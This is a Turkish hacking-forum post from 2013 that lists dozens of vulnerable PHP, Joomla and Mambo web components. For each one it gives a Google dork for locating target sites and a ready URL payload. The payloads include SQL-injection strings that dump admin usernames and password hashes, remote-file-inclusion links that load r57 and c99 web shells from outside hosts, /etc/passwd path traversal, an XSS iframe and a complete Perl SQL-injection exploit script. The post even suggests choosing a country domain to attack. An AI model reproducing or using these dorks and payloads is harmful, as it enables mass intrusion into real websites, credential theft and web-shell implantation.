İPUCU

Web & Server Güvenliği Doğru web ve veritabanı sunucusu güvenliği sağlanmadan, bilgisayar korsanları hassas verilerinize erişebilir. Web, Sunucu ve veritabanı güvenliğini nasıl sağlayacağınızı buradan öğrenebilirsiniz.

Seçenekler

İstemediğiniz Kadar Dork ....!

02-07-2013 01:23
#1
Fearlessleon - ait Kullanıcı Resmi (Avatar)
- HARBİYELİ -
Üyelik tarihi:
02/2013
Nereden:
Hacking.py
Yaş:
29
Mesajlar:
6.676
Teşekkür (Etti):
1224
Teşekkür (Aldı):
1869
Konular:
1552
Ticaret:
(0) %
PHP-Nuke (Kose_Yazilari) Açığı

Google Arama : ''name Kose_Yazilari op viewarticle artid''
Google arama : ''name Kose_Yazilari op printpage artid''

Site sonuna : modules.php?name=""KoseUS95Yazilari&op=viewarticle &artid=-11223344%2F%2A%2A%2Funion%2F%2A%2A%2Fselect%2F%2A% 2A%2F0,1,aid,pwd,4,5%2F%2A%2A%2Ffrom%2F%2A%2A%2Fnu keUS95authors

modules.php?name="KoseUS95Yazilari&op=printpage&ar tid=-99999999%2F%2A%2A%2FUNION%2F%2A%2A%2FSELECT%2F%2A% 2A%2F0,pwd,aid,3%2F%2A%2A%2Ffrom%2F%2A%2A%2FnukeUS 95authors



WorldTube Açığı

Google Arama: "inurl:/plugins/wordtube"

Site Sonuna : wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://shell/r57.txt?

Not: Html'den sonrasına kendi shell adresiniz gerekli.



Joomla" Component EventList Açığı

Google Arama : intext: Event List 0.8 Alpha by schlu.net

Site Sonuna : //index.php?option=com_eventlist&func=details&did=99 99999999999%20union%20select%200,0,concat(char(117 ,115,101,114,110,97,109,101,58),username,char(32,1 12,97,115,115,119,111,114,100,58),password),4,5,6, 7,8,9,00,0,444,555,0,777,0,999,0,0,0,0,0,0,0%20fro m%20jos_users/*



Powered By 6rbScript Açığı

Google Arama : Powered by 6rbScript

Site Sonuna

PWD

http://www.xxx.com/news.php?newsid=7...m3na_authors--

USER

http://www.xxx.com/news.php?newsid=7...m3na_authors--



Com-Actualite Açığı

Google Arama : allinurl: "com_actualite"

Site sonuna : index.php?option=com_actualite&task=edit&id=-1%20union%20select%201,concat(username,char(32),pa ssword),3,4,5,6,7,8,9%20from%20jos_users/*



Com-Mtree Açığı

Google Arama : inurl:"/com_mtree/"

Site sonuna : http://[target]/[mambo_path]/components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_pat h=



Webring Component (component_dir) Açığı

Google Arama: inurl:com_webring

Site Sonuna : http://www.site.com/[path]/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://evil_scripts?



Com-Lmo Açığı

Google Arama : "com_lmo"

Site Sonuna : $lmo_dateipfad=$mosConfig_absolute_path."/administrator/components/com_lmo/";
$lmo_url=$mosConfig_live_site."/administrator/components/com_lmo/";



Com-PonyGallery Açığı

Google Arama : inurl:"index.php?option=com_ponygallery"

Site Sonuna : //index.php?option=com_ponygallery&Itemid=x&func=vie wcategory&catid=%20union%20select%201,2,3,concat(c har(117,115,101,114,110,97,109,101,58),username,ch ar(32,112,97,115,115,119,111,114,100,58),password) ,5,0,0%20from%20jos_users/*



Com-NeoRecruit Açığı

Google Arama : inurl:index.php?option=com_NeoRecruit

Site Sonuna : //index.php?option=com_neorecruit&task=offer_view&id =99999999999%20union%20select%201,concat(char(117, 115,101,114,110,97,109,101,58),username,char(32,11 2,97,115,115,119,111,114,100,58),password),3,4,5,6 ,7,8,111,222,333,444,0,0,0,555,666,777,888,1,2,3,4 ,5,0%20from%20jos_users/*



Com-Rsfiles Açığı

Google Arama : inurl:"/index.php?option=com_rsfiles"

Site sonuna : //index.php?option=com_rsfiles&task=files.display&pa th=..|index.php
//index.php?option=com_rsfiles&task=files.display&pa th=



Com-Nicetalk Açığı

Google Arama : inurl:index.php?option=com_nicetalk

Site sonuna : //index.php?option=com_nicetalk&tagid=-2)%20union%20select%201,2,3,4,5,6,7,8,0,999,concat (char(117,115,101,114,110,97,109,101,58),username, char(32,112,97,115,115,119,111,114,100,58),passwor d),777,666,555,444,333,222,111%20from%20jos_users/*



Com-Joomlaradiov5

Google Arama : inurl:"com_joomlaradiov5"

Site Sonuna : http://www.site.com/administrator/co.../c99haxor.txt?



Com-JoomlaFlashFun Açığı

Google Arama : "com_joomlaflashfun"

Site Sonuna : XXX.net: The Leading XXX Site on the Net[attacker]



Carousel Flash Image Açığı

Google Arama : inurl:"com_jjgallery

Site Sonuna : http://[Taget]/[Path]/administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://sibersavascilar.com/shelz/r57.txt ?



Com-Mambads Açığı

Google Arama : inurl:com_mambads

Site Sonuna :
index.php?option=com_mambads&Itemid=0&func=detail& cacat=1&casb=1&caid=999/**/Union/**/select/**/1,2,3,4,5,concat(char(117,115,101,114,110,97,109,1 01,58),username,char(32,112,97,115,115,119,111,114 ,100,58),password),7,8,9,10,11,12,13,14,15,16,17,1 8,19,20,21,22,23%20from%20mos_users/*

wered By: MFH v1 Açığı

Dork: "Powered by: MFH v1"

Exploitation options:

ADIM 1: /members.php?folders=1&fid=-1+union+all+select+1,2,concat(user,0x3a,email),pas s,5,6,7,8+from+users+-- to get the users

ADIM 2: Go to /members.php?folders=1&fid=-1+union+all+select+1,2,admin,pass,5,6,7,8+from+set ting+-- to get the admin info

ADIM 3: Go to /members.php?folders=1&fid=-1+union+all+select+1,2,user,pass,5,6,7,8+from+serv er+-- to get the ftp server info (if its configured)




W.G.C.C Açığı

Google Dork : "Web Group Communication Center"

Exploit:
XSS:
http://[target]/[path]/profile.php?action=show&userid=%22%3E%3C%69%66%72% 61%6D%65%20%73%72%63%3D%68%74%74%70%3A%2F%2F%68%61 %2E%63%6B%65%72%73%2E%6F%72%67%2F%73%63%72%69%70%7 4%6C%65%74%2E%68%74%6D%6C%3C




Powered By Zomplog Açığı

Dork: "powered by zomplog"

Exploit:
http://localhost/path/upload/force_d...e_download.php




Xcart Rfi Açığı

Google dork : "X-CART. Powerful PHP shopping cart software"

Exploit

site.com/[xcart-path]/config.php?xcart_dir=http://shell.txt?
site.com/[xcart-path]/prepare.php?xcart_dir=http://shell.txt?
site.com/[xcart-path]/smarty.php?xcart_dir=http://shell.txt?
site.com/[xcart-path]/customer/product.php?xcart_dir=http://shell.txt?
site.com/[xcart-path]/provider/auth.php?xcart_dir=http://shell.txt?
site.com/[xcart-path]/admin/auth.php?xcart_dir=http://shell.txt?




Plugin-Class tabanlı Sistemlerde Açık

Google Dork: index.php?loc= veya allinurl:.br/index.php?loc=

Exploide:

administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path= inurl:"us/index.php?option=com_comprofiler"

Note: 2. dorkda .br/ yazan yerin yerine saldırmak istediğiniz ülkenin uzantısını yazabilirsiniz...




Powered By Linkspile Açığı

Dork : Powered By linkspile

Exploit :

Example Domain x3a,0x3a,0x3a,email),8,9,10,11,12,13,14,15,16,17,1 8/**/from/**/lp_user_tb/*



The Realestate ****** Açığı

Dork : inurl:dpage.php?docID

Exploit : Example Domain ord)+from+admin




Calogic Calendars V1.2.2 Açığı

Dork : "CaLogic Calendars V1.2.2"

POC : http://localhost/[******_PATH]/userreg.php?langsel={SQL}

Example : http://localhost/[******_PATH]/userreg.php?langsel=1 and 1=0 UNION SELECT concat(uname,0x3a,pw) FROM clc_user_reg where uid=CHAR(49)--




Powered By PHPizabi Açığı

Dork: "Powered by PHPizabi v0.848b C1 HFP1"

Exploit:

http://localhost/izabi/system/cache/...s/id_shell.php

Example:

http://localhost/izabi/system/image.....php&width=500




AJ Auction 6.2.1 Açığı

DORK: inurl:"classifide_ad.php"

Exploide:

http://site.com/classifide_ad.php?it...assword),6,7,8, 9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25, 26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42 ,43,44,45,46,47,48,49,50,51,52,53,54/**/FROM/**/admin/**/LIMIT/**/0,1/*




Powered By Novus Açığı

Dork: "Powered by Novus"

İnformation server:

http://[novus]/notas.asp?nota_id=1+a...t(int,db_name())
http://[novus]/notas.asp?nota_id=1+a...nt,system_user)
http://[novus]/notas.asp?nota_id=1+a...@servername)--
http://[novus]/notas.asp?nota_id=1+a...t,@@version)--




Com-Mgm Açığı

Google Dork: inurl:"com_mgm"

Exploide:

administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://megaturks.by.ru/c99.txt?




Com-Loudmounth Açığı

Dork: inurl:com_loudmounth

Exploid:
/components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://megaturks.by.ru/c99.txt?




Com-Thopper Açığı

Google Dork : inurl:com_thopper veya inurlhp?option=com_thopper

Exploid:
/components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://nachrichtenmann.de/r57.txt?
/components/com_thopper/inc/itemstatus_type.php?mosConfig_absolute_path=http://nachrichtenmann.de/r57.txt?
/components/com_thopper/inc/projectstatus_type.php?mosConfig_absolute_path=htt p://nachrichtenmann.de/r57.txt?
/components/com_thopper/inc/request_type.php?mosConfig_absolute_path=http://nachrichtenmann.de/r57.txt?
/components/com_thopper/inc/responses_type.php?mosConfig_absolute_path=http://nachrichtenmann.de/r57.txt?
/components/com_thopper/inc/timelog_type.php?mosConfig_absolute_path=http://nachrichtenmann.de/r57.txt?
/components/com_thopper/inc/urgency_type.php?mosConfig_absolute_path=http://nachrichtenmann.de/r57.txt?




Com-Bsq-Sitestats Açığı

Google Dork: inurl:com_bsq_sitestats

Exploid:
/components/com_bsq_sitestats/external/rssfeed.php?baseDir=http://megaturks.by.ru/c99.txt?




Com-PeopleBook Açığı

Google Dork: inurl:com_peoplebook

Exploid:
/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://megaturks.by.ru/c99.txt?




Joomla Component AstatsPRO Açığı

Dork: allinurl: "com_astatspro"

Exploide: administrator/components/com_astatspro/refer.php?id=-1/**/union/**/select/**/0,concat(username,0x3a,password,0x3a,usertype),con cat(username,0x3a,password,0x3a,usertype)/**/from/**/jos_users/*




WorkingOnWeb 2.0.1400 Açığı

Dork: Powered by WorkingOnWeb 2.0.1400

Exploide:

http://localhost/events.php?idevent=...ll,0,0,0,0,0,0, 0/**/from/**/mysql.user/*




Powered by cpDynaLinks Açığı

Dork: Powered by cpDynaLinks

connecting in http://127.0.0.1/...
[!] user: admin [!] pass: c9cb9115e90580e14a0407ed1fcf8039

use strict;
use LWP::UserAgent;

my $host = $ARGV[0];

if(!$ARGV[0]) {
print "\n
cpDynaLinks 1.02 Remote Sql Inyection exploit\n";
print "
written by ka0x - ka0x01[at]gmail.com\n";
print "
usage: perl $0 [host]\n";
print "
example: http://host.com/cpDynaLinks\n";
exit(1);
}

print "\n
connecting in $host...\n";
my $cnx = LWP::UserAgent->new() or die;
my $go=$cnx->get($host."/category.php?category=-1'/**/union/**/select/**/1,2,3,concat(0x5f5f5f5f,0x5b215d20757365723a20,adm in_username,0x20205b215d20706173733a20,admin_passw ord,0x5f5f5f5f),5,6,7,8,9,9,9,9/**/from/**/mnl_admin/*");
if ($go->content =~ m/____(.*?)____/ms) {
print "$1\n";
} else {
print "\n[-] exploit failed\n";
}
Gelen sayfada "kaynağı görüntüle"yiniz. İlk satırlarda admin nick vs md5 ler yer alır




Maplab-2.2 Açığı

Dorks:

index.of /maplab-2.2
intitle:MapLab
index.of /maplab-2.2
index.of /maplab/

Exploit:
http://site.com/pathmaplab/htdocs/gm...hp?gszAppPath=[EvilScript]




Maplab-2.2 Açığı

Dorks:

index.of /maplab-2.2
intitle:MapLab
index.of /maplab-2.2
index.of /maplab/

Exploit:
http://site.com/pathmaplab/htdocs/gm...hp?gszAppPath=[EvilScript]




Admidio 1.4.8 RFI Açığı

Dork : "Admidio Team"
POC : /adm_program/modules/download/get_file.php?folder=&file=../../../../../../../../../../etc/passwd&default_folder=
Example : http://demo.admidio.org/adm_program/...efault_folder=




ezContents CMS Açığı

Dork: "ezContents CMS Version 2.0.0"

Exploits:

http://site.com/[patch]/showdetails.php?contentname="'/**/union/**/select/**/1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 ,21,22,23,24,25,26,27,28,concat(login,0x3a,userpas sword,char(58,58),authoremail),30/**/from/**/authors/**/where/**/authorid=1/*

Exploits 2:

http://site.com/[patch]/printer.php?article='/**/union/**/select/**/1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 ,21,22,23,24,25,26,27,28,concat(login,0x3a,userpas sword,char(58,58),authoremail),30/**/from/**/authors/**/where/**/authorid=1/*




SoftbizScripts Açığı

Dork: "inurl:Powered by SoftbizScripts" veya "Subscribe Newsletter"

Exploit: http://www.ssss.com/hostdirectory/se...php?host_id=-1 union select 1,2,concat(sb_id,0x3a,sb_admin_name,0x3a,sb_pwd),4 ,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9 ,0,1,2,3,4,5,6,7,8,9 from sb_host_admin--

****** Açığıdır...




ProfileCMS v1.0 Açığı

Dork: "Powered By ProfileCMS v1.0" veya "Total Generators & Widgets"

Exploit: http://target.com/index.php?app=prof...x3a,username,0 x3a,password,0x3a,email),4,5,6,7,8,9,10%20from%20u sers/*

target.org a,password,0x3a,email),3,4,5,6%20from%20users/*

Target.net a,password,0x3a,email),3,4,5,6%20from%20users/*

Target.net 3737764),3,4,5,6%20from%20users/*




Com-Rsgallery Açığı

Dork: : "option=com_rsgallery" veya inurl:index.php?option=com_rsgallery

Exploit: /index.php?option=com_rsgallery&page=inline&catid=-1%20union%20select%201,2,3,4,concat(username,0x3a, password),6,7,8,9,10,11%20from%20mos_users--

Admin nick vs hashları verir. Joomlada bulunan bir açıktır

Admin girişi: /administrator/




Powered By Power Editor Açığı

Dork: Powered By Power Editor

Exploid : http://site.com/editor.php?action=tempedit&m=[base64 password]&te=[local_file]&dir=[local_dir] examp: editor.php?action=tempedit&m=Y2hhbmdlbWU=&te=/etc/passwd&dir=../../../../../../../../../..




Kmitam Açığı

Dork: "inurl:/kmitam/"

Poc/Exploit: kmitaadmin/kmitam/htmlcode.php?file=http://attacker.com/evil?

Yöntemi: Shell




BackLinkSpider Açığı

Dork: "Powered By BackLinkSpider" veya "inurl:backlinkspider.php"

Exploit: http://www.site.com/[backlinkspider_page_name].php?cat_id=[SQL]

http://www.site.com/[backlinkspider_page_name].php?cat_id=-1%20union%20select%201,2,3,4,5,6,7,8,9,0,1,version (),3,4,5,6,7,8,9,0/*
Kullanıcı İmzası
Bir gün yine yeniden..
SpecialForces Teşekkür etti.

02-07-2013 14:04
#2
Fearlessleon - ait Kullanıcı Resmi (Avatar)
- HARBİYELİ -
Üyelik tarihi:
02/2013
Nereden:
Hacking.py
Yaş:
29
Mesajlar:
6.676
Teşekkür (Etti):
1224
Teşekkür (Aldı):
1869
Konular:
1552
Ticaret:
(0) %
güncel
Kullanıcı İmzası
Bir gün yine yeniden..

Bookmarks


« Önceki Konu | Sonraki Konu »
Seçenekler

Yetkileriniz
Sizin Yeni Konu Acma Yetkiniz var yok
You may not post replies
Sizin eklenti yükleme yetkiniz yok
You may not edit your posts

BB code is Açık
Smileler Açık
[IMG] Kodları Açık
HTML-Kodları Kapalı
Trackbacks are Kapalı
Pingbacks are Kapalı
Refbacks are Kapalı